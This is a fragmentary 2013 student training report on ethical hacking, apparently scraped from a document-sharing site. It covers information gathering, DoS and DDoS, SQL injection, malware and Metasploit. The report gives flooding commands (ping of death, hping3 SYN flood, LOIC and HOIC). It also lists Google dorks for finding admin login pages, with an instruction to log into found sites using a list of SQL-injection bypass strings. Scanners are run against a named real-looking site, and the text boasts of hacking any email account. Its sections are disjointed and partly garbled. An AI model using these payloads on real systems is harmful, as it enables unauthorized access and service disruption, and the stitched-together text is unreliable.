Professional Documents
Culture Documents
Report On Topic: Raghav Bisht 7/16/2013
Report On Topic: Raghav Bisht 7/16/2013
Report On Topic: Raghav Bisht 7/16/2013
Report On Topic
Raghav Bisht
7/16/2013
SEMINAR ON INDUSTRIAL TRAINING
(June-July, 2013)
Submitted by
Raghav Bisht
Discipline of CSE/IT
June-July, 2013
DECLARATION 2013
I hereby declare that I have completed my six weeks summer training at Bytec0de Securities
PVT. LTD from 25th May 2013 to 25th July 2013 under the guidance of Mr. Mohit Yadav. I
have worked with full dedication during these six weeks and my learning outcomes fulfill the
requirements of training.
I would like to acknowledge my trainer Mr. Mohit Yadav who gave me opportunity to develop
my hacking skills under their roof and all the other hackers who appreciate my work and
supported me till the end of my training.
A special thanks to Mr. Shorty420 & p7771 (Black hat) for sharing their work experience and
knowledge with me.
I wish to thanks my family and friends. Without them, I could not have completed my training.
I would also like to thank the people who directly or indirectly helped me on this term paper.
THANKING YOU
Index 2013
Organization overview
Training Objective
Course Outline
Introduction to hacking and security
Ethical hacking and IT security
Technology aspects for IT security & ethical hacking
Steps of hacking
Dos & Ddos attack
Wireless hacking
SQL Injection
Malware
Pen testing
Metasploit
Reason for choosing CEH
Gantt chart
Bibliography
Organization Overview 2013
From the starting they only deliver the best quality and knowledge base solutions with a very
high standard to their students, clients and partners. Bytecode believes in teamwork, with every
new day the quest for acquiring new competencies continues. Forever searching, experimenting,
innovating, learning, moving ahead with our sincere efforts and dedication, shaping the future,
and challenging our competencies to create new opportunities, is a never-ending process in the
company.
They have successfully deliver training and workshop related services to the govt. departments,
corporate, institutions and other giants Indian engineering colleges and schools.
They highly provide the certifications and training services for giants such as:
Location:
1. What is hacking?
Hacking is a process to bypass the security mechanisms of information system or
network. Hacking is done in step partly by creative thinking and partly by using
different tools at a time.
Or,
Hacking is an unauthorized use of computer and network resources. Most people
think that hackers are computer criminals. They fail to recognize the fact that
criminals and hackers are two total different things. Media is responsible for this.
Hackers in reality are actually good and extremely intelligent people who by using
their knowledge in a constructive manner help organizations, companies,
government, etc. to secure documents and secret information on the internet.
So, hackers, as popularly defined, are computer experts who spend enormous
amount of time trying to breach the security of networks, web servers and emails.
Usually they use selection of specialist software to identify weakness, which are
then exploited.
The majority do it for fun and as a challenge. They’re not interested in attacking
private individuals. It’s the big companies and authorities they go for.
There are just two aspects of hacking that you have to worry about as a private
individual. One is that your details are on various company databases, and when
they are cracked, information about you can be stolen.
Hacker can enter any remote system to get all information without any
trace.
Hack any email password, website, and take down network with help of
ddos attack.
Hacker can break any password.
Hacker can call to anyone without tracing.
Ethical Hacking & IT Security 2013
Ethical hacking & IT security requirements are different from each person, like a
normal computer user want to protect their information’s from virus, etc and a
student want to break his friends email accounts, college teachers accounts and
valuable information’s as per their needs.
System administrators want to maintain information’s safely from outside and
inside attacks. Also maintain logs threads to investigate an attack.
A business man wants to protect their information’s securely from outside and
inside attacks, some of businessman interested in intelligence on competitors for
their business benefits, following are others interests:
1. To protect the sensitive information’s in the company’s database. A
company’s database will usually not just contain information about company
itself, but also data about its clients and employees. As such, should
malicious hackers be able to breach the system, they could very well get
their hands on information involving a lot of people in one go.
2. To protect the database itself. Malicious hackers may not just steal the
information in your system. To add insult to injury, they can also send
viruses into your system that could very well corrupt it and wipe out
everything in your database. This means the company losing a lot of very
important information.
3. To protect a business interests of the company. If the database of a company
is left unsecured and malicious hackers are able to gain access to the
information in it, the company can very well lose the respect of its clients,
partners and the business worlds.
A forensic analysist want to investigate cyber cases to find out cyber criminals so
he need latest technology to solve all issues in minimum time and penetration
testers want to find loopholes in software’s or network services to reduce risk.
A black hat hacker want to steal TOP SECRET information’s from business and
military computers for different agenda, now everything is depend on
information’s it may be for national security or war plans etc, like China is more
interested to steel valuable information’s from USA, India, South Korea, Japan,
Thailand, Vietnam, etc
1. IT act / laws
Each country has their own cyber law to prevent, monitor and investigate cyber
crime.
Now a day’s cyber criminal understands the complexity of laws and their effects.
Also some country has tight security on gateway level using their own central
monitoring system like China, Russia, India, etc.
India:
India does not have any “lawful interception law”. All it has is the
“unconstitutional” provisions of the information technology act 2000 (through IT
act 2008 amendments). Through these amendments, the cyber law of India has
been made an “instrumentality” of e-surveillance in India. There are no procedural
safeguards that can prevent the illegal and unconstitutional e-surveillance activities
in India.
The only resource for Indians in such circumstances is to use “self defense” and
prevent the illegal and unconstitutional encroachment upon their “civil liberties”
like right to privacy. You can do the following:
1. Use disposable e-mails to avoid e-mail surveillance.
2. Use safeguards like TOR against illegal internet eavesdropping and
sniffing.
3. Use TOR for instant messaging and mobile phones for private and secure
conversation.
4. For blackberry users and those believing in a good combination of
privacy and security, use pretty good privacy along with any good smart
phone. This way you can have a better and e-surveillance free mobile
infrastructure then the feature controversial blackberry phones.
5. Use Enigmail for encrypted emails.
Recently, the United Nations declared “right to access” to internet as human right.
This would have a positive impact upon many human rights in cyber-space. For
instance, right to speech and expression, right to privacy, right to know, etc cannot
be violated by the CMS project of India. United Nations must expand Human
Rights Protection to many more issues.
This is the real problem for the CMS project of India. We have no dedicated
privacy laws in India, Data security laws in India and data protection law in India.
Further, the CMS project of India is also beyond the “Parliamentary Security”. The
cyber law of India, incorporated in the information technology act 2000, was
drastically amended through the information technology amendment act 2008.
The IT act 2008 incorporated various “unconstitutional provisions” in the cyber
law of India that clearly violates the human rights in cyberspace. For instance,
provisions regarding internet censorship, website blocking, encryption and
decryption, etc have no inbuilt “procedural safeguards” as mandated by the
constitution of India. This is the reason why the cyber law of India needs to be
repealed.
Further we have no E-Surveillance policy in India. Even phone tapping in India is
done in an “Unconstitutional manner” and even by private individuals with or
without governmental approval.
If CMS project of India has to be legal has to be “legal and constitutional” it must
be subject to “parliamentary oversight”. Further, the IT act 2000 must be repealed
as soon as possible as it is clearly not in conformity with the constitution of India
and civil liberties protection in cyberspace.
The golden shield project colloquially referred to as the great firewall of china is a
censorship and surveillance project operated by the ministry of public security
division of the government of the people’s republic of china. The project was
initiated in 1998 and began operations in November 2003.
“Individuals are prohibited from using the internet to: harm national security;
disclose state secrets; or injure the interests of the state or society. Users are
prohibited from using the internet to create, replicate, retrieve, or transmit
information that in-cities resistance to the PRC Constitutions, laws, or
administrative regulations; promotes the overthrow of the government or socialist
system; undermines national unification; distorts the truth, spreads rumors, or
destroys social order; or provides sexually suggestive material or encourages
gambling, violence, or murder. Users are prohibited from engaging in activities
that harm the security of computer information networks and from using networks
or changing network resources without prior approval”
Purpose of the project is to block content by preventing IP address from being
routed through and consist of standard firewalls and proxy server at the internet
gateways. Through DNS cache poisoning it’s possible to make unreachable
specific website are requested.
In Oct. 2001, Greg Walton of the International centre for human rights and
domestic development published a report; he wrote:
1. IP blocking
IP blocking is a form of security used on mail, Web or any other Internet servers to
block connections from a specific IP address or range of addresses that are
considered undesirable or hostile. For example, a Web site forum administrator
who sees spam or unwanted posts from a user may block that user's IP address to
prevent them from using the discussion board.
Blacklist: In Internet terminology, a generic name for a list of e-mail addresses or
IP addresses that are originating with known spammers. Individuals and enterprises
can use blacklists to filter out unwanted e-mails, as most e-mail applications today
have filtering capabilities.
4. Packet filtering
On the Internet, packet filtering is the process of passing or blocking packets at a
network interface based on source and destination addresses, ports, or protocols.
The process is used in conjunction with packet mangling and Network Address
Translation (NAT). Packet filtering is often part of a firewall program for
protecting a local network from unwanted intrusion. In a software firewall, packet
filtering is done by a program called a packet filter. The packet filter examines the
header of each packet based on a specific set of rules, and on that basis, decides to
prevent it from passing (called DROP) or allow it to pass (called ACCEPT).
Technology aspect for IT security & ethical hacking 2013
Story:
“In real war a solder must need to understandable all weapons and there timing
effect as per target to win the war in minimum time”
Same IT security and Ethical hacking we need to break Antivirus, Firewall, IDS,
and IPS for penetration testing or ethical hacking.
1. Antivirus
Effective antivirus software guards your computer from all forms of malware,
including traditional computer viruses, worms, Trojan horses and even
sophisticated, blended attacks. Not only does antivirus software detect and
eliminate any viruses or malware that may have already infected your hard drive,
many solutions that offer a free virus scan actively prevent new infections before
they have a chance to affect your computer. Antivirus software will scan and
analyze emails and files for infection as they are downloaded.
Using the method of signature-based detection, antivirus software checks a file's
contents against a dictionary of known virus signatures - a pattern of code that
uniquely identifies a virus. If a virus signature is found, the antivirus software will
remove the threat.
Antivirus software obviously detects potential threats in a few different ways. But
what about the latest and greatest viruses? Because people create new viruses
every day, an antivirus program will constantly update its dictionary of virus
signatures. Many antivirus software programs -- including those that offer free
virus protection -- also employ heuristic analysis, which can identify variants of
known malware - viruses that have been mutated or refined by attackers to create
different strains.
And destination addresses and port numbers. This is known as address filtering.
Firewall can also filter specific type of network traffic. This is also known as
protocol filtering because the decision to forward or reject traffic is dependent
upon the protocol used, for example HTTP, ftp or telnet. Firewalls can also filter
traffic by packet attribute or state.
4. Anomaly Based
An IDS which is anomaly based will monitor network traffic and compare it
against an established baseline. The baseline will identify what is “normal” for that
network- what sort of bandwidth is generally used, what protocols are used, what
ports and devices generally connect to each other- and alert the administrator or
user when traffic is detected which is anomalous, or significantly different, than
the baseline.
5. IPS (Intrusion prevention system)
Intrusion prevention is a preemptive approach to network security used to identify
potential threats and respond to them swiftly. Like an intrusion detection system
(IDS), an intrusion prevention system (IPS) monitors network traffic. However,
because an exploit may be carried out very quickly after the attacker gains access,
intrusion prevention systems also have the ability to take immediate action, based
on a set of rules established by the network administrator. For example, an IPS
might drop a packet that it determines to be malicious and block all further traffic
from that IP address or port. Legitimate traffic, meanwhile, should be forwarded to
the recipient with no apparent disruption or delay of service.
According to Michael Reed of Top Layer Networks, an effective intrusion
prevention system should also perform more complex monitoring and analysis,
such as watching and responding to traffic patterns as well as individual packets.
"Detection mechanisms can include address matching, HTTP string and substring
matching, generic pattern matching, TCP connection analysis, packet anomaly
detection, traffic anomaly detection and TCP/UDP port matching."
Broadly speaking, an intrusion prevention system can be said to include any
product or practice used to keep attackers from gaining access to your network,
such as firewalls and anti-virus software.
Steps of Hacking 2013
1. Information gathering
This is a first step of hacking and penetration testing attack; first we collect all
information’s of target with help of tools and manual ways. Without much
information our success rate of attacks also low.
Manual Process:
1. Get URL using Google search.
2. Using whois sites.
5. www.who.is
6. www.robtex.com
7. www.domaintools.com
3. Get PDF and Document using Google special features:
8. Site:4share.com CISSP
9. Site:pastebin.com inurl:hack
10. Chemistry filetype:doc
11. http://www.googleguide.com/advanced_operators_refere
nce.html
Automated Process:
1. We use following tools for information gathering:
12. Uberharvest
13. theharvester.py
14. metaGooFii
15. Web Data Extractors ( Email-Phone no Extractors )
16. Maltego
2. People Search:
pipl.com
anywho.com
address.com
Social networking sites (facebook, linedin, twitter)
Job Sites [ dice.com, monster.com,naukri.com ]
3. Phone Number
truecaller.com
kgdetective.com
phunwa.com
5. Email IP Tracking
wspy.org
Emailtrackerpro.com
Readnotify.com
Politemail.com
2. Banner Grabbing:
Banner grabbing is a process to know exact version of target application to search
loopholes or exploits or zero day.
Telnet
ID serve
3. Vulnerability Scanning
This step is used to find out loopholes in applications using tools, after we use
public and private exploit to enter on target system remotely.
Vulnerability scanner:
Acunetix
netsparke
nessus
gfi languard
Whatweb [ Find out web application ][ Backtrack Tool ]
E.g.: ./whatweb bytec0de.com
zoomscan [ scan zoomla website ] [ /pentest/web/zoomscan ]
E.g.: ./joomscan.pl -u http://liclanka.com/
Nikto:
E.g. ./nikto.pl -host liclanka.com
Websecurifi
Vega
w3af
webshag
After find out vulnerability we look for exploit we need to compile those using
their associated language and change shell code if required for connect back.
4. Exploitation (Obtaining access)
Program exploitation is a staple of hacking. A program is made up of a complex
set of rules following a certain execution flow that ultimately tells the computer
what to do. Exploiting a program is simply a clever way of getting the computer to
do what you want it to do, even if the currently running program was designed to
prevent that action. Since a program can really only do what it’s designed to do,
the security holes are actually flaws or oversights in the design of the program or
the environment the program is running in. It takes a creative mind to find these
holes and to write programs that compensate for them. Sometimes these holes are
the products of relatively obvious programmer errors, but there are some less
obvious errors that have given birth to more complex exploit techniques that can be
applied in many different places.
1. Dos Attack
A "denial-of-service" attack is characterized by an explicit attempt by attackers to
prevent legitimate users of a service from using that service. Examples include
attempts to "flood" a network, thereby preventing legitimate network traffic
attempts to disrupt connections between two machines, thereby preventing
access to a service
attempts to prevent a particular individual from accessing a service
attempts to disrupt service to a specific system or person
It is an attempt to make a
machine or network resource unavailable to its intended users. Consuming all
resources given to person. Like Network bandwidth , all Type Of Memory etc.
Ping Of Death
o ping -t -l 6550 google.com [ max buffer size = 65500 ]
o Effective system [ Solaris 2.4 , minix , win3.11,95 ]
SYN-ATTACK
o Hping -i sudo hping3 -i u1 -S -p 80 192.168.1.1
UDP/HTTP/TCP Flooding
o LOIC
o HOIC
Smurf Attack
o make your own packet and flood on network
pktbuilder
packETH 1.6 (linux & windows)
CDP Flooding (Cisco Discovery Protocol)
o yersinia [ backtrack ]
o Done on Cisco Switches & Routers
MAC Flooding
o Flooding network switches
o ARP Spoofing
o Net cut [ Windows ]
o ettercap [ Backtrack ]
o Deauthentication Technique
2. Ddos Attack
DDOS, short for Distributed Denial of Service, is a type of DOS attack where
multiple compromised systems -- which are usually infected with a Trojan -- are
used to target a single system causing a Denial of Service (DoS) attack. Victims of
a DDoS attack consist of both the end targeted system and all systems maliciously
used and controlled by the hacker in the distributed attack.
According to this report on e-Security Planet, in a DDoS attack, the incoming
traffic flooding the victim originates from many different sources – potentially
hundreds of thousands or more. This effectively makes it impossible to stop the
attack simply by blocking a single IP address; plus, it is very difficult to distinguish
legitimate user traffic from attack traffic when spread across so many points of
origin.
Distribution of attack techniques: January 2013
1. MYSQL Injection
Dorks Code
o inurl:admin.asp
o inurl:login/admin.asp
o inurl:admin/login.asp
o inurl:adminlogin.asp
o inurl:adminhome.asp
o inurl:admin_login.asp
o inurl:administrator_login.asp
I am going to use:
Code:
http://site.com/Admin_Login.asp
Logging
Now you can find some site over these dorks and try to log in with:
Username: Admin
Password: password' or 1=1--
Instead of password' or 1=1 you can use some of these:
Code:
'or'1'='1
' or '1'='1
' or 'x'='x
' or 0=0 --
" or 0=0 --
or 0=0 --
' or 0=0 #
" or 0=0 #
or 0=0 #
' or 'x'='x
" or "x"="x
' or 1=1--
" or 1=1--
or 1=1--
' or a=a--
" or "a"="a
'or'1=1'
Password ’ or 1=1 will the confuse server and will let you log in.
So if you are able to log in, site is vulnerable and you are going to be able to use
admin panel.
This is a big catchall phrase that covers all sorts of software with nasty intent. Not
buggy software, not programs you don’t like, but software which is specifically
written with the intent to harm.
Virus:
This is a specific type of malware that spreads itself once it’s initially run. It’s
different from other types of malware because it can either be like a parasite that
attaches to good files on your machine, or it can be self-contained and search out
other machines to infect.
Worm:
Think of inchworms rather than tapeworms. These are not parasitic worms, but the
kind that move around on their own. In the malware sense, they’re viruses that are
self-contained (they don’t attach themselves like a parasite) and go around
searching out other machines to infect.
Trojan:
Do you remember that story you had to read in high school about the big wooden
horse that turned out to be full of guys with spears? This is the computer
equivalent. You run a file that is supposed to be something fun or important, but it
turns out that it’s neither fun nor important, and it’s now doing nasty things to your
machine.
Penetration Testing 2013
Introduction:
Penetration Testing
Automated Manual
VA by Tools Using:
Metasploit
1. If we want to do pen test on any website like, www.anysite.com we need
DNS Records from robtex.com & whois records and other type of
information this part is known as Information Gathering.
2. After we use backtrack operating system (also known as pen-testing OS
for security experts) toolkit for auto pen-testing with help of free tools
like: Nikto, Privoxy, Nessus, Samurai etc.
3. Make report for all found vulnerabilities and cross verify.
4. Use commercial software’s like:
Core Impact, Canvas, Qualys Guard, Xcobra, NTOSpider, KSES,
AppScan, Webinspect, Brupsuite, Acunetix WVS etc.
5. Make report for new vulnerabilities.
6. After we will start manual pen-testing with help of Metasploit &
Reverse eng tools.
7. Find vulnerabilities and take screen shots for Proof-Of-Concept create
custom report.
8. Forward Custom Report to company.
Metasploit 2013
1. What is Metasploit?
The Metasploit project is an open-source, computer security project which
provides information about security vulnerabilities and aids in penetration
testing and IDS signature development. Its most well-known sub-project is the
Metasploit framework, a tool for developing and executing exploit code
against a remote target machine. Other important sub projects include the op-
code Database, shell code archive, and security research. Metasploit is a best
hacking framework for local and remote hacking done in an easy way.
Metasploit Terms:
MSFconsole:
Msfconsole Commands:
1. Show Entering 'show' at the msfconsole prompt will display every
module within Metasploit. There are a number of 'show' commands
you can use but the ones you will use most frequently are 'show
auxiliary', 'show exploits', 'show payloads', 'show encoders'.
6. check There aren't many exploits that support it, but there is also
a 'check' option that will check to see if a target is vulnerable to a
particular exploit instead of actually exploiting it.
Session –i To interact with a given session, you just need to use the '-i'
switch followed by the Id number of the session.
Reason for choosing CEH 2013
http://anti-virus-software-review.toptenreviews.com/